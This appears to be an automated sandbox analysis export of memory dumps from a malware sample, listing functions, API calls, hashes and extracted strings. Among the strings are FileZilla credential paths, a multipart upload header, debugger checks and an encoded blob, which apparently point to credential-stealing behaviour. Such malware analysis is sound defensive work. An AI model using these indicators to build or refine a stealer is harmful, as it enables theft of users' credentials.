Source File: 00000000.00000002.3106792811.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_OlZzqwjrwO.jbxd

Yara matches

Similarity

API ID: _strlen
String ID: Content-Disposition: form-data; name="$A@6e$A@6e$Content-Type: attachment/x-object$RY30$SqDe87817huf871793q74$^^4$^^4$ame=$ilen
API String ID: 4218353326-1595699696
Opcode ID: 7907d723524d677c7fba307958eceda359f7f54ff42f453c8872ada657c95bff
Instruction ID: 2d689a8b6144ae040ff6817911910587bd341415a88b77611baba4cffa878017
Opcode Fuzzy Hash: 7907d723524d677c7fba307958eceda359f7f54ff42f453c8872ada657c95bff
Instruction Fuzzy Hash: EC72A771D442198BDF18CF98D9855FEBBB0EB14314F24056BE915EB360E3788A858BCB

Function 00434FAC Relevance: 23.8, APIs: 3, Strings: 10, Instructions: 1008COMMON

Download Yara Rule

APIs

_strncpy.LIBCMT ref: 0043532D

Strings

x_B>, xrefs: 00435341
$jRk, xrefs: 004355D5
TBJZidQZ06sb5pW3YfJPrWEyf4gjh9c0mU/IqqyLBZjR26pm9LoFs/Dyzd+rN/4r78bPv7mZtOP81UqVgqjTOJZDXK0g1t/2zYyr8+JKnBcgAt63LmhmeMOA3+6c0pmyiMftbbAPwnaC16dRcUmWxu2c9ZEGgSfrzprF/DrDBM/tMndPpg1vtXSeHAptAS42vkak4Eb4Oo3EyJbARoKJTh9mZci6yA9XiU+HttmhDTBEecmsGjOwbrXx+yHLf7Qa1lyK, xrefs: 0043551E, 00435C7E, 00436095
3Z@, xrefs: 00434FB8, 00435953, 00435970, 00435B7E
TT4, xrefs: 004356AE
y_B>, xrefs: 0043534C
TT4, xrefs: 004360B7
576xed, xrefs: 0043596B, 00435A57, 00435B79, 00435D50
$jRk, xrefs: 004356F3
y_B>, xrefs: 00435D88

Memory Dump Source

Source File: 00000000.00000002.3106792811.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_OlZzqwjrwO.jbxd

Yara matches

Similarity

API ID: _strncpy
String ID: $jRk$$jRk$3Z@$576xed$TBJZidQZ06sb5pW3YfJPrWEyf4gjh9c0mU/IqqyLBZjR26pm9LoFs/Dyzd+rN/4r78bPv7mZtOP81UqVgqjTOJZDXK0g1t/2zYyr8+JKnBcgAt63LmhmeMOA3+6c0pmyiMftbbAPwnaC16dRcUmWxu2c9ZEGgSfrzprF/DrDBM/tMndPpg1vtXSeHAptAS42vkak4Eb4Oo3EyJbARoKJTh9mZci6yA9XiU+HttmhDTBEecmsGjOwbrXx+yHLf7Qa1lyK$TT4$TT4$x_B>$y_B>$y_B>
API String ID: 2961919466-2156214959
Opcode ID: 736beb57220df515d506b056ccd7fd11a59d56b837410d7613fdb76fd6dde63c
Instruction ID: c1f0278ec094f6be02d202c53d620e15fc525e7d6860b659e372b79efda81f17
Opcode Fuzzy Hash: 736beb57220df515d506b056ccd7fd11a59d56b837410d7613fdb76fd6dde63c
Instruction Fuzzy Hash: 3982DBB1D0051A8BDF28DB68C9451BEB670EB5C310F29662BE505EB360D738DE418B9F

Function 0041AA49 Relevance: 19.7, APIs: 6, Strings: 5, Instructions: 473COMMON

Download Yara Rule

APIs

_strlen.LIBCMT ref: 0041ACEB
_strlen.LIBCMT ref: 0041AE2E
_strlen.LIBCMT ref: 0041B216
_strlen.LIBCMT ref: 0041B231

Strings

SqDe87817huf871793q74, xrefs: 0041AF36
(, xrefs: 0041B178
&, xrefs: 0041B12D
:[, xrefs: 0041B135
Content-Disposition: form-data; name=", xrefs: 0041B180

Memory Dump Source

Source File: 00000000.00000002.3106792811.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_OlZzqwjrwO.jbxd

Yara matches

Similarity

API ID: _strlen
String ID: Content-Disposition: form-data; name="$ &$($:[$SqDe87817huf871793q74
API String ID: 4218353326-898291561
Opcode ID: f011c9fed8efc87c81c5afbe689e28c72ff5ebee152719aa64aabc7cc97206bc
Instruction ID: fda5cd55cfb9f0796932eaeb7ac8b2d4ab06e0c9493bffbe09938a436643aec3
Opcode Fuzzy Hash: f011c9fed8efc87c81c5afbe689e28c72ff5ebee152719aa64aabc7cc97206bc
Instruction Fuzzy Hash: 7F128DB090560A8BCF18CF58C9901BEBBB1FF54354F24592BE855EB394D7388991CB8B

Function 008AD8BF Relevance: 17.8, Strings: 13, Instructions: 1594COMMON

Download Yara Rule

Strings

TBJZidQZ06sb5pW3YfJPrWEyf4gjh9c0mU/IqqyLBZjR26pm9LoFs/Dyzd+rN/4r78bPv7mZtOP81UqVgqjTOJZDXK0g1t/2zYyr8+JKnBcgAt63LmhmeMOA3+6c0pmyiMftbbAPwnaC16dRcUmWxu2c9ZEGgSfrzprF/DrDBM/tMndPpg1vtXSeHAptAS42vkak4Eb4Oo3EyJbARoKJTh9mZci6yA9XiU+HttmhDTBEecmsGjOwbrXx+yHLf7Qa1lyK, xrefs: 008AD967, 008AE849
y_B>, xrefs: 008AE278
Aan(, xrefs: 008ADDAA
Aan(, xrefs: 008ADAF0
%appdata%\FileZilla, xrefs: 008ADEBB, 008ADEC0, 008ADED3
TT4, xrefs: 008AE196
q7 C, xrefs: 008AE6B7
ST4, xrefs: 008ADBB8
Applications/FileZilla, xrefs: 008ADEB0, 008ADEB5, 008ADECD
$jRk, xrefs: 008AE140
?, xrefs: 008AEF3B
TT4, xrefs: 008AEDA7
@an(, xrefs: 008ADACF

Memory Dump Source

Source File: 00000000.00000002.3106975275.0000000000880000.00000040.00001000.00020000.00000000.sdmp, Offset: 00880000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_880000_OlZzqwjrwO.jbxd

Yara matches

Similarity

API ID:
String ID: $jRk$%appdata%\FileZilla$?$@an($Aan($Aan($Applications/FileZilla$ST4$TBJZidQZ06sb5pW3YfJPrWEyf4gjh9c0mU/IqqyLBZjR26pm9LoFs/Dyzd+rN/4r78bPv7mZtOP81UqVgqjTOJZDXK0g1t/2zYyr8+JKnBcgAt63LmhmeMOA3+6c0pmyiMftbbAPwnaC16dRcUmWxu2c9ZEGgSfrzprF/DrDBM/tMndPpg1vtXSeHAptAS42vkak4Eb4Oo3EyJbARoKJTh9mZci6yA9XiU+HttmhDTBEecmsGjOwbrXx+yHLf7Qa1lyK$TT4$TT4$q7 C$y_B>
API String ID: 0-3692191384
Opcode ID: ac9e16b0cfef5ad753a7f837f43482241b5d65ef7839f325e8b94ed3ba3a55b2
Instruction ID: c834a210395cd1aaa017dfc397298b83e931bed22fb6902ca65ec94610472108
Opcode Fuzzy Hash: ac9e16b0cfef5ad753a7f837f43482241b5d65ef7839f325e8b94ed3ba3a55b2
Instruction Fuzzy Hash: 50C229B1D0021E9BEF24ABEC89425BE7970FB16714F240937E506FAF91E679C9408793

Function 0040112C Relevance: 14.3, APIs: 3, Strings: 5, Instructions: 335COMMON

Download Yara Rule

Strings

f3@, xrefs: 00401138
y_B>, xrefs: 0040160E
y_B>, xrefs: 00401977
TBJZidQZ06sb5pW3YfJPrWEyf4gjh9c0mU/IqqyLBZjR26pm9LoFs/Dyzd+rN/4r78bPv7mZtOP81UqVgqjTOJZDXK0g1t/2zYyr8+JKnBcgAt63LmhmeMOA3+6c0pmyiMftbbAPwnaC16dRcUmWxu2c9ZEGgSfrzprF/DrDBM/tMndPpg1vtXSeHAptAS42vkak4Eb4Oo3EyJbARoKJTh9mZci6yA9XiU+HttmhDTBEecmsGjOwbrXx+yHLf7Qa1lyK, xrefs: 004013F6, 0040145E, 004015A1
x_B>, xrefs: 004013B9

Memory Dump Source

Source File: 00000000.00000002.3106792811.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_OlZzqwjrwO.jbxd

Yara matches

Similarity

API ID:
String ID: TBJZidQZ06sb5pW3YfJPrWEyf4gjh9c0mU/IqqyLBZjR26pm9LoFs/Dyzd+rN/4r78bPv7mZtOP81UqVgqjTOJZDXK0g1t/2zYyr8+JKnBcgAt63LmhmeMOA3+6c0pmyiMftbbAPwnaC16dRcUmWxu2c9ZEGgSfrzprF/DrDBM/tMndPpg1vtXSeHAptAS42vkak4Eb4Oo3EyJbARoKJTh9mZci6yA9XiU+HttmhDTBEecmsGjOwbrXx+yHLf7Qa1lyK$f3@$x_B>$y_B>$y_B>
API String ID: 0-2726889951
Opcode ID: 4d800e4a8c53861f20154e06e0aaefdbc94ae587142e1632d027028e9bc40389
Instruction ID: 769378b0013e5f891025f4b50e79353ec4a26f3ac52f3a61e025b4fcd72a7191
Opcode Fuzzy Hash: 4d800e4a8c53861f20154e06e0aaefdbc94ae587142e1632d027028e9bc40389
Instruction Fuzzy Hash: 2BC1A1756183019BCB2C8A19C99153EBAE5AB85314F14893FF556EB3F0E338D8419B4B

Function 0043A4FE Relevance: 11.3, APIs: 1, Strings: 5, Instructions: 823COMMON

Download Yara Rule

APIs

_strlen.LIBCMT ref: 0043A740

Strings

Y=`, xrefs: 0043A58A
Ju^%, xrefs: 0043A658
Y=`, xrefs: 0043A932
Ku^%, xrefs: 0043AA66
Y=`, xrefs: 0043A514

Memory Dump Source

Source File: 00000000.00000002.3106792811.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_OlZzqwjrwO.jbxd

Yara matches

Similarity

API ID: _strlen
String ID: Ju^%$Ku^%$Y=`$Y=`$Y=`
API String ID: 4218353326-1811093487
Opcode ID: cf27e2aad08aa0ad968c1e6dfb0571fb3b005bd4e8b72d189d402ef4653cb86d
Instruction ID: 68bed0c00360ed0a45c1e6ce9cbfc25002c960087630870fd3b76e024578c11c
Opcode Fuzzy Hash: cf27e2aad08aa0ad968c1e6dfb0571fb3b005bd4e8b72d189d402ef4653cb86d
Instruction Fuzzy Hash: D662D3B1D402198BCF24CB98C9856BEBBB0EB18305F24251BD595FB350D33CCA518BAB

Function 00428334 Relevance: 11.1, Strings: 8, Instructions: 1067COMMON

Download Yara Rule

Strings

y_B>, xrefs: 004285E3
ST4, xrefs: 00428386
TBJZidQZ06sb5pW3YfJPrWEyf4gjh9c0mU/IqqyLBZjR26pm9LoFs/Dyzd+rN/4r78bPv7mZtOP81UqVgqjTOJZDXK0g1t/2zYyr8+JKnBcgAt63LmhmeMOA3+6c0pmyiMftbbAPwnaC16dRcUmWxu2c9ZEGgSfrzprF/DrDBM/tMndPpg1vtXSeHAptAS42vkak4Eb4Oo3EyJbARoKJTh9mZci6yA9XiU+HttmhDTBEecmsGjOwbrXx+yHLf7Qa1lyK, xrefs: 00428A0D, 00428C49
$jRk, xrefs: 0042848F
TT4, xrefs: 0042970A
$jRk, xrefs: 0042906E
q7 C, xrefs: 004292BF
q7 C, xrefs: 00428AB7

Memory Dump Source

Source File: 00000000.00000002.3106792811.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_OlZzqwjrwO.jbxd

Yara matches

Similarity

API ID:
String ID: $jRk$$jRk$ST4$TBJZidQZ06sb5pW3YfJPrWEyf4gjh9c0mU/IqqyLBZjR26pm9LoFs/Dyzd+rN/4r78bPv7mZtOP81UqVgqjTOJZDXK0g1t/2zYyr8+JKnBcgAt63LmhmeMOA3+6c0pmyiMftbbAPwnaC16dRcUmWxu2c9ZEGgSfrzprF/DrDBM/tMndPpg1vtXSeHAptAS42vkak4Eb4Oo3EyJbARoKJTh9mZci6yA9XiU+HttmhDTBEecmsGjOwbrXx+yHLf7Qa1lyK$TT4$q7 C$q7 C$y_B>
API String ID: 0-2767669607
Opcode ID: 19062003c26532868454498e227e50f3dc71298f1981b794ebff368204a50fa7
Instruction ID: 5ed2bce57202caa61740e9a0066a193a3aa364e15e010ca0d77f5b321bac14a1
Opcode Fuzzy Hash: 19062003c26532868454498e227e50f3dc71298f1981b794ebff368204a50fa7
Instruction Fuzzy Hash: 6792C670B0A3159BD724DF18E58563EBAE1EB94700FA8891FE5C9CB390D679CC418B4B

Function 00439535 Relevance: 10.9, Strings: 8, Instructions: 905COMMON

Download Yara Rule

Strings

)lu, xrefs: 00439B97
v2B, xrefs: 004397D3
v2B, xrefs: 004395B9
n_v, xrefs: 0043A492
(lu, xrefs: 00439651
n_v, xrefs: 00439BA2
u2B, xrefs: 004397C8
)lu, xrefs: 004396AC

Memory Dump Source

Source File: 00000000.00000002.3106792811.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_OlZzqwjrwO.jbxd

Yara matches

Similarity

API ID: _strlen
String ID: (lu$)lu$)lu$n_v$n_v$u2B$v2B$v2B
API String ID: 4218353326-1100714106
Opcode ID: fc83baca781e6038d85ce843f57f52639d84c7305a5e30f3d91329c925e2716a
Instruction ID: a2355ce2209b5258348a648dcbfed05c01f212a34098c733ae6d56c92e88b106
Opcode Fuzzy Hash: fc83baca781e6038d85ce843f57f52639d84c7305a5e30f3d91329c925e2716a
Instruction Fuzzy Hash: 717284B2D001199BCF64CFAC848557EB6B0BB18310F24251BD55AEB351E3B89E91CF9B

Function 00457B30 Relevance: 10.2, APIs: 1, Strings: 4, Instructions: 1436COMMON

Download Yara Rule

APIs

__floor_pentium4.LIBCMT ref: 00457D14

Strings

1#IND, xrefs: 00457C35
1#SNAN, xrefs: 00457C3C
1#QNAN, xrefs: 00457C43
1#INF, xrefs: 00457C66

Memory Dump Source

Source File: 00000000.00000002.3106792811.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_OlZzqwjrwO.jbxd

Yara matches

Similarity

API ID: __floor_pentium4
String ID: 1#IND$1#INF$1#QNAN$1#SNAN
API String ID: 4168288129-2761157908
Opcode ID: 9df9496146953a9c334645953d65b23cf1161b90a9ddbaf06c4857e78f5672f2
Instruction ID: 851cf4d307f2775529c2b2c48624cd02a74d3cb87db6a9e2c754e45b37c83e55
Opcode Fuzzy Hash: 9df9496146953a9c334645953d65b23cf1161b90a9ddbaf06c4857e78f5672f2
Instruction Fuzzy Hash: C5D23B71E082288FDB65CE24DD407EAB7B5EB44306F1445EBD80DE7241EB78AE898F45

Function 00424C8D Relevance: 7.4, Strings: 5, Instructions: 1174COMMON

Download Yara Rule

Strings

U5 S, xrefs: 00425889
]cnq, xrefs: 0042550D
T5 S, xrefs: 00424F0D
U5 S, xrefs: 00426114
fS)), xrefs: 0042574F

Memory Dump Source

Source File: 00000000.00000002.3106792811.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_OlZzqwjrwO.jbxd

Yara matches

Similarity

API ID: File$CloseCreateHandleModuleName
String ID: T5 S$U5 S$U5 S$]cnq$fS))
API String ID: 2106025501-2879408294
Opcode ID: d4ef6aecc819cbfd79ed1537f8e605b86188b9f0b6e42f283061d9fbf544773c
Instruction ID: dfb0ff48f0b3588d0c8ddc0fc82928454e0cf031636ecd05e75d9b592114eb49
Opcode Fuzzy Hash: d4ef6aecc819cbfd79ed1537f8e605b86188b9f0b6e42f283061d9fbf544773c
Instruction Fuzzy Hash: B2A271B07097118BD724EF1DE69522EBBE0EB94750FA58D1FE185CB350E638C8819B4B

Function 0041EBEB Relevance: 6.8, Strings: 5, Instructions: 537COMMON

Download Yara Rule

Strings

)lu, xrefs: 0041F082
)lu, xrefs: 0041EF48
n_v, xrefs: 0041F08D
(lu, xrefs: 0041EE71
n_v, xrefs: 0041EFBB

Memory Dump Source

Source File: 00000000.00000002.3106792811.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_OlZzqwjrwO.jbxd

Yara matches

Similarity

API ID:
String ID: (lu$)lu$)lu$n_v$n_v
API String ID: 0-3830700584
Opcode ID: 19f3eafb4a0e727bd08de773a29381a3a5c2a5b051c77c6b774b19f95aa7016b
Instruction ID: 4a2fd8414ffc0d2b7e824df66967180c6b9bc980e05f2bb9b5fb8abbe135a622
Opcode Fuzzy Hash: 19f3eafb4a0e727bd08de773a29381a3a5c2a5b051c77c6b774b19f95aa7016b
Instruction Fuzzy Hash: 1D22B478D0460A9BCF24CF9DC8956FFBBB0EB14304F24052BD515EB351D3789A868B9A

Function 0044F244 Relevance: 6.3, APIs: 4, Instructions: 337COMMON

Download Yara Rule

APIs

_strrchr.LIBCMT ref: 0044F2D1

Memory Dump Source

Source File: 00000000.00000002.3106792811.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_OlZzqwjrwO.jbxd

Yara matches

Similarity

API ID: _strrchr
String ID:
API String ID: 3213747228-0
Opcode ID: 05cda982c4f09bd88feb10a38f7641e7fd96d80131b6e6d53e56f63ddc665004
Instruction ID: 8ec8fb1480d7890853f4d9f50d5551423c0e27afaeab5e375f7c18d1f8a446b0
Opcode Fuzzy Hash: 05cda982c4f09bd88feb10a38f7641e7fd96d80131b6e6d53e56f63ddc665004
Instruction Fuzzy Hash: 7EB147329002559FFB11CF68C8817EFBBA5EF55304F14817BE815AB342D6389D0ACB69

Function 00451FBC Relevance: 6.1, APIs: 4, Instructions: 129fileCOMMON

Download Yara Rule

APIs

FindFirstFileExW.KERNEL32(00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00452057
FindNextFileW.KERNEL32(00000000,?), ref: 004520D2
FindClose.KERNEL32(00000000), ref: 004520F4
FindClose.KERNEL32(00000000), ref: 00452117

Memory Dump Source

Source File: 00000000.00000002.3106792811.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_OlZzqwjrwO.jbxd

Yara matches

Similarity

API ID: Find$CloseFile$FirstNext
String ID:
API String ID: 1164774033-0
Opcode ID: b3559cba144369e4368cc0700d5b7fee314850b44e79167534ac2f09849a45e7
Instruction ID: 88b061fe18a59ed71dd7726e396f37314d98d9ff08531aa008276cfa6a830ce1
Opcode Fuzzy Hash: b3559cba144369e4368cc0700d5b7fee314850b44e79167534ac2f09849a45e7
Instruction Fuzzy Hash: 4F411971901519AFDF20DF64DD88ABFB379EB4530AF004197E905D3181E7B89E88CB69

Function 0043CE95 Relevance: 6.1, APIs: 4, Instructions: 73COMMON

Download Yara Rule

APIs

IsProcessorFeaturePresent.KERNEL32(00000017), ref: 0043CEA1
IsDebuggerPresent.KERNEL32 ref: 0043CF6D
SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 0043CF8D
UnhandledExceptionFilter.KERNEL32(?), ref: 0043CF97

Memory Dump Source

Source File: 00000000.00000002.3106792811.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_OlZzqwjrwO.jbxd

Yara matches

Similarity

API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
String ID:
API String ID: 254469556-0
Opcode ID: 5a224689ebe3c8543fae9108879d47dacd2795cfdd161b4ae1d22f43ac1ac262
Instruction ID: 9043f40afcec0259649162862996236607bac432cbf7b643fd488768b54bd5d0
Opcode Fuzzy Hash: 5a224689ebe3c8543fae9108879d47dacd2795cfdd161b4ae1d22f43ac1ac262
Instruction Fuzzy Hash: 57312BB5D05219DBDB10DF65D989BCDBBB8AF08304F1040AAE40DA7250EBB55A84CF49

Function 008BD0FC Relevance: 6.1, APIs: 4, Instructions: 73COMMON

Download Yara Rule

APIs

IsProcessorFeaturePresent.KERNEL32(00000017), ref: 008BD108
IsDebuggerPresent.KERNEL32 ref: 008BD1D4
SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 008BD1F4
UnhandledExceptionFilter.KERNEL32(?), ref: 008BD1FE

Memory Dump Source

Source File: 00000000.00000002.3106975275.0000000000880000.00000040.00001000.00020000.00000000.sdmp, Offset: 00880000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_880000_OlZzqwjrwO.jbxd

Yara matches

Similarity

API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
String ID:
API String ID: 254469556-0
Opcode ID: 5a224689ebe3c8543fae9108879d47dacd2795cfdd161b4ae1d22f43ac1ac262
Instruction ID: fd136ee3c906d7a0c1b6e93d7987c7766eedd2a21a12b2222822fff26f72981a
Opcode Fuzzy Hash: 5a224689ebe3c8543fae9108879d47dacd2795cfdd161b4ae1d22f43ac1ac262
Instruction Fuzzy Hash: 5D312875901318ABDB20DF64D989BCDBBB8FF08304F1040AAE40CA7250EBB19A85CF55

Function 0044E33B Relevance: 4.6, APIs: 3, Instructions: 77COMMONLIBRARYCODE

Download Yara Rule

APIs

IsDebuggerPresent.KERNEL32(?,?,?,?,?,00405C85), ref: 0044E433
SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,00405C85), ref: 0044E43D
UnhandledExceptionFilter.KERNEL32(0045F807,?,?,?,?,?,00405C85), ref: 0044E44A

Memory Dump Source

Source File: 00000000.00000002.3106792811.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_OlZzqwjrwO.jbxd

Yara matches

Similarity

API ID: ExceptionFilterUnhandled$DebuggerPresent
String ID:
API String ID: 3906539128-0
Opcode ID: b1a3c3a0be8d6b4b88a7661e414be1e1f565848d8e3606674681f7b5372028ed
Instruction ID: af30a7423d53b2ed9e05bfdfaa0a26c4abe4ecd8aa3d0fdc8ac6f86824fa8700
Opcode Fuzzy Hash: b1a3c3a0be8d6b4b88a7661e414be1e1f565848d8e3606674681f7b5372028ed
Instruction Fuzzy Hash: 2231C4749012299BCB21DF65D889BCDBBB8BF08310F5041EAE81CA7250E7749F858F49

Function 00424BED Relevance: 4.5, APIs: 3, Instructions: 32fileCOMMON

Download Yara Rule

APIs

GetModuleFileNameW.KERNEL32(?,?,00000200), ref: 00424C0E
CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000), ref: 00424C22
CloseHandle.KERNEL32(00000000), ref: 00424C2E

Memory Dump Source

Source File: 00000000.00000002.3106792811.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_OlZzqwjrwO.jbxd

Yara matches

Similarity

API ID: File$CloseCreateHandleModuleName
String ID:
API String ID: 2106025501-0
Opcode ID: d94bae1b59913256bf7e4af9c8c5c466c157ae71dd916d4649055dd816ca84e8
Instruction ID: 0f79836f08216e1067b19f7748282cd10e66abfb9a44897a3127195f29ea1e18
Opcode Fuzzy Hash: d94bae1b59913256bf7e4af9c8c5c466c157ae71dd916d4649055dd816ca84e8
Instruction Fuzzy Hash: 97F0A071201130BBD2349B2AEC4CF57BF6CEF86B70F014215FB19AB2A0D2789812C6D5

Function 0041764A Relevance: 4.4, APIs: 1, Strings: 1, Instructions: 917COMMON

Download Yara Rule

APIs

_strlen.LIBCMT ref: 00417773

Strings

=`f\, xrefs: 00417D3A, 00417E7A

Memory Dump Source

Source File: 00000000.00000002.3106792811.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_OlZzqwjrwO.jbxd

Yara matches

Similarity

API ID: _strlen
String ID: =`f\
API String ID: 4218353326-984147390
Opcode ID: cefc6376a0a262524adde921cf2748f1d933b06b63e13b6ea41360376ed59fc9
Instruction ID: 937e01e95affed1bb86c4fb585bebd6cec6f4652e38a753aecbb8c34d3dca93f
Opcode Fuzzy Hash: cefc6376a0a262524adde921cf2748f1d933b06b63e13b6ea41360376ed59fc9
Instruction Fuzzy Hash: E5822671508301AFDB14CF19C880AABBBE1FF88344F04892EF99987391D779D995CB96

Function 008978B1 Relevance: 4.4, APIs: 1, Strings: 1, Instructions: 917COMMON

Download Yara Rule

APIs

_strlen.LIBCMT ref: 008979DA

Strings

=`f\, xrefs: 00897FA1, 008980E1

Memory Dump Source

Source File: 00000000.00000002.3106975275.0000000000880000.00000040.00001000.00020000.00000000.sdmp, Offset: 00880000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_880000_OlZzqwjrwO.jbxd

Yara matches

Similarity

API ID: _strlen
String ID: =`f\
API String ID: 4218353326-984147390
Opcode ID: c84d8bab664dab9cd0f48d91de88ba0d679f2a9024c898dd52fba93cb0488266
Instruction ID: 318749226ae2eaf1d54c956836e05046f04150b6d1b63a1857d515818c216ca8
Opcode Fuzzy Hash: c84d8bab664dab9cd0f48d91de88ba0d679f2a9024c898dd52fba93cb0488266
Instruction Fuzzy Hash: A0823071608345EFDB14DF18C880AAABBE1FF88304F48892DF98987391D735E954DB92

Function 0043BCA4 Relevance: 4.4, Strings: 3, Instructions: 611COMMON

Download Yara Rule

Strings

TBJZidQZ06sb5pW3YfJPrWEyf4gjh9c0mU/IqqyLBZjR26pm9LoFs/Dyzd+rN/4r78bPv7mZtOP81UqVgqjTOJZDXK0g1t/2zYyr8+JKnBcgAt63LmhmeMOA3+6c0pmyiMftbbAPwnaC16dRcUmWxu2c9ZEGgSfrzprF/DrDBM/tMndPpg1vtXSeHAptAS42vkak4Eb4Oo3EyJbARoKJTh9mZci6yA9XiU+HttmhDTBEecmsGjOwbrXx+yHLf7Qa1lyK, xrefs: 0043C0A4, 0043C33A
y_B>, xrefs: 0043C00B
y_B>, xrefs: 0043C403

Memory Dump Source

Source File: 00000000.00000002.3106792811.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_OlZzqwjrwO.jbxd

Yara matches

Similarity

API ID:
String ID: TBJZidQZ06sb5pW3YfJPrWEyf4gjh9c0mU/IqqyLBZjR26pm9LoFs/Dyzd+rN/4r78bPv7mZtOP81UqVgqjTOJZDXK0g1t/2zYyr8+JKnBcgAt63LmhmeMOA3+6c0pmyiMftbbAPwnaC16dRcUmWxu2c9ZEGgSfrzprF/DrDBM/tMndPpg1vtXSeHAptAS42vkak4Eb4Oo3EyJbARoKJTh9mZci6yA9XiU+HttmhDTBEecmsGjOwbrXx+yHLf7Qa1lyK$y_B>$y_B>
API String ID: 0-3325869852
Opcode ID: 88ae354af438063a33d3c2dde5e6d733d8a20db6495eb275dc7889d5d4cf3e35
Instruction ID: c217e240e4de63698dbdc007ec6427f3aed3e10ff69f5bbbebf730a7c1cd9681
Opcode Fuzzy Hash: 88ae354af438063a33d3c2dde5e6d733d8a20db6495eb275dc7889d5d4cf3e35
Instruction Fuzzy Hash: B5328371D0011A8BDF249A9889916BFB670EF58320F24792BD515FB390D73C9E428BDA

Function 00415C7E Relevance: 3.9, Strings: 3, Instructions: 120COMMONLIBRARYCODE

Download Yara Rule

Strings

3333, xrefs: 00415CD3
UUUU, xrefs: 00415CFE
UUUU, xrefs: 00415CCA

Memory Dump Source

Source File: 00000000.00000002.3106792811.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_OlZzqwjrwO.jbxd

Yara matches

Similarity

API ID:
String ID: 3333$UUUU$UUUU
API String ID: 0-1588839328
Opcode ID: 17534d5a281498b08f04e5be694ea266bc4322b6d1202bf75d22475c47ae82c3
Instruction ID: db216e20b05cf36e7dbad7cd7ff9f755db6c04a52abf1afa55db9664f95289aa
Opcode Fuzzy Hash: 17534d5a281498b08f04e5be694ea266bc4322b6d1202bf75d22475c47ae82c3
Instruction Fuzzy Hash: 31419FB1610704CBCB588F19C88479277E6ABD8320F5981AADD058F38AE7B9CCC5CBC4

Function 0088092B Relevance: 3.8, Strings: 3, Instructions: 90COMMON

Download Yara Rule

Strings

GetProcAddress., xrefs: 008809DC, 008809DF, 008809E4
., xrefs: 0088095F
l, xrefs: 00880966

Memory Dump Source

Source File: 00000000.00000002.3106975275.0000000000880000.00000040.00001000.00020000.00000000.sdmp, Offset: 00880000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_880000_OlZzqwjrwO.jbxd

Yara matches

Similarity

API ID:
String ID: .$GetProcAddress.$l
API String ID: 0-2784972518
Opcode ID: 067b9ac1cfdfa220879cc7a8ef70782a20aa364414f13e2dc252473fde93e59c
Instruction ID: f3d91120766a02e33a9fa05b12d28410e080fcf066640d8f17665adcd8ab3234
Opcode Fuzzy Hash: 067b9ac1cfdfa220879cc7a8ef70782a20aa364414f13e2dc252473fde93e59c
Instruction Fuzzy Hash: 0B314BB6900609DFDB50DF99C880AADBBF5FF48324F25414AD841E7211D771EA49CFA4

Function 00448800 Relevance: 3.4, APIs: 2, Instructions: 449COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.3106792811.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_OlZzqwjrwO.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
